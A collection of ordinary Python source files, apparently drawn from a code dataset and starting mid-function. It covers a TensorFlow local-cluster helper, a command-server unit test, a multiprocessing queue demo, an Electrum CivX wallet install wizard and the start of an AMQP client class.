ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
test_command_server.py
|
import threading
import time
import unittest
from pisat.comm.transceiver import SocketTransceiver, CommSocket
from pisat.tester.comm import TestTransceiver
from can09.server.command_server import CommandServer
from can09.server.request import (
Request, RequestForm,
CommandBase, CommandParams, RequestCommandError, RequestParams
)
class TestCommand(CommandBase):
COMMAND = b"AA"
LEN_ARGS = CommandParams.ARGS_NOTHING
@classmethod
def exec(cls, sock: CommSocket, params: RequestParams) -> None:
pass
def test_decorator(name: str):
def _test_decorator(func):
def test(self):
print(f"\nStart {name}...")
func(self)
print(f"... Finish {name}")
return test
return _test_decorator
class TestCommandServer(unittest.TestCase):
def setUp(self) -> None:
self.addr_server = (0,)
self.addr_client = (1,)
self.transceiver_server = TestTransceiver(self.addr_server, name="server")
self.transceiver_client = TestTransceiver(self.addr_client, name="client")
self.socket_transceiver_server = SocketTransceiver(self.transceiver_server, name="st_server")
self.socket_transceiver_client = SocketTransceiver(self.transceiver_client, name="st_client")
self.request = Request
self.command_server = CommandServer(self.socket_transceiver_server, self.request)
self.command_server.append(TestCommand)
def make_request_form(self) -> RequestForm:
form = RequestForm()
form.reception_num = 1
form.command = TestCommand
form.args = (b"a", b"b", b"c")
return form
def make_request(self) -> bytes:
sock = self.socket_transceiver_client.create_socket(self.addr_server)
form = self.make_request_form()
return Request.make_request(sock, form)
@test_decorator("test_make_request")
def test_make_request(self):
request_ideal = b"$\x01AA1$1:1:1$abc"
request = self.make_request()
self.assertEqual(request, request_ideal)
@test_decorator("test_parse_request")
def test_parse_request(self):
self.exec_client()
sock = self.socket_transceiver_server.listen()
params = self.request.parse_request(sock)
print(f"RECEPTION NUMBER: {params.reception_num}")
print(f"COMMAND NAME: {params.command}")
print(f"ADDRESS: {params.address}")
print(f"ARGUMENTS: {params.args}")
def exec_client(self):
def _exec_client():
time.sleep(3)
request = self.make_request()
self.socket_transceiver_client.send_raw(self.addr_server, request)
th = threading.Thread(target=_exec_client)
th.start()
@test_decorator("test_serve")
def test_serve(self):
self.exec_client()
self.command_server.start_serve(timeout=5.)
@test_decorator("test_serve_no_command")
def test_serve_no_command(self):
server = CommandServer(self.socket_transceiver_server, Request)
try:
server.start_serve(timeout=5.)
raise Exception("RequestCommandError has not occured.")
except RequestCommandError:
pass
if __name__ == "__main__":
unittest.main()
|
borrar.py
|
from multiprocessing import Process, Queue, Value
from time import sleep, time
class Hijo():
mensaje:str='Original'
#def __init__(self):
# self.qq = Queue()
def start(self, q:Queue):
self.qq = q
espera = 10
while True:
for _ in range(espera):
if not self.qq.empty():
msj = self.qq.get()
print(self.mensaje, msj)
sleep(1)
print('Esperando...')
#sleep(espera)
class Padre():
def __init__(self):
pass
def start(self):
h = Hijo()
h.mensaje = 'H de padre'
self.qq = Queue()
proc = Process(target=h.start, args=(self.qq,))
proc.start()
i : int = 0
while True:
print('Padre', i)
self.qq.put(i)
i += 1
sleep(5)
if __name__ == "__main__":
Padre().start()
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_civx.wallet import Wallet
from electrum_civx.storage import WalletStorage
from electrum_civx.util import UserCancelled, InvalidPassword
from electrum_civx.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_civx.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum CivX - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum CivX wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('With it, you can recover your tokens if you loose your wallet.'),
_('Without it, your tokens will be lost forever.'),
_('To make sure that you have properly saved your seed, please enter it here to validate.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum-CIVX communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum-CIVX "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
client.py
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=too-many-lines
import logging
import threading
import time
import uuid
from uamqp import (Connection, Session, address, authentication, c_uamqp,
compat, constants, errors, receiver, sender)
from uamqp.constants import TransportType
_logger = logging.getLogger(__name__)
class AMQPClient(object):
"""An AMQP client.
:param remote_address: The AMQP endpoint to connect to. This could be a send target
or a receive source.
:type remote_address: str, bytes or ~uamqp.address.Address
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, remote_address, auth=None, client_name=None, debug=False,
error_policy=None, keep_alive_interval=None, **kwargs):
self._encoding = kwargs.pop('encoding', None) or 'UTF-8'
self._transport_type = kwargs.pop('transport_type', None) or TransportType.Amqp
self._http_proxy = kwargs.pop('http_proxy', None)
self._remote_address = remote_address if isinstance(remote_address, address.Address) \
else address.Address(remote_address)
self._hostname = self._remote_address.hostname
if not auth:
username = self._remote_address.username
password = self._remote_address.password
if username and password:
username = compat.unquote_plus(username)
password = compat.unquote_plus(password)
auth = authentication.SASLPlain(
self._hostname, username, password,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._auth = auth if auth else authentication.SASLAnonymous(
self._hostname,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._name = client_name if client_name else str(uuid.uuid4())
self._debug_trace = debug
self._counter = c_uamqp.TickCounter()
self._shutdown = False
self._connection = None
self._ext_connection = False
self._session = None
self._backoff = 0
self._error_policy = error_policy or errors.ErrorPolicy()
self._keep_alive_interval = int(keep_alive_interval) if keep_alive_interval else 0
self._keep_alive_thread = None
# Connection settings
self._max_frame_size = kwargs.pop('max_frame_size', None) or constants.MAX_FRAME_SIZE_BYTES
self._channel_max = kwargs.pop('channel_max', None)
self._idle_timeout = kwargs.pop('idle_timeout', None)
self._properties = kwargs.pop('properties', None)
self._remote_idle_timeout_empty_frame_send_ratio = kwargs.pop(
'remote_idle_timeout_empty_frame_send_ratio', None)
# Session settings
self._outgoing_window = kwargs.pop('outgoing_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._incoming_window = kwargs.pop('incoming_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._handle_max = kwargs.pop('handle_max', None)
self._on_attach = kwargs.pop('on_attach', None)
# Link settings
self._send_settle_mode = kwargs.pop('send_settle_mode', None) or constants.SenderSettleMode.Unsettled
self._receive_settle_mode = kwargs.pop('receive_settle_mode', None) or constants.ReceiverSettleMode.PeekLock
self._desired_capabilities = kwargs.pop('desired_capabilities', None)
# AMQP object settings
self.message_handler = None
self.connection_type = Connection
self.session_type = Session
if kwargs:
raise ValueError("Received unrecognized kwargs: {}".format(", ".join(kwargs.keys())))
def __enter__(self):
"""Run Client in a context manager."""
self.open()
return self
def __exit__(self, *args):
"""Close and destroy Client on exiting a context manager."""
self.close()
def _keep_alive(self):
start_time = self._counter.get_current_ms()
try:
while self._connection and not self._shutdown:
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - start_time)/1000
if elapsed_time >= self._keep_alive_interval:
_logger.debug("Keeping %r connection alive.", self.__class__.__name__)
self._connection.work()
start_time = current_time
time.sleep(1)
except Exception as e: # pylint: disable=broad-except
_logger.info("Connection keep-alive for %r failed: %r.", self.__class__.__name__, e)
def _client_ready(self): # pylint: disable=no-self-use
"""Determine whether the client is ready to start sending and/or
receiving messages. To be ready, the connection must be open and
authentication complete.
:rtype: bool
"""
return True
def _client_run(self):
"""Perform a single Connection iteration."""
self._connection.work()
def _redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if not self._connection._cbs: # pylint: disable=protected-access
_logger.debug("Closing non-CBS session.")
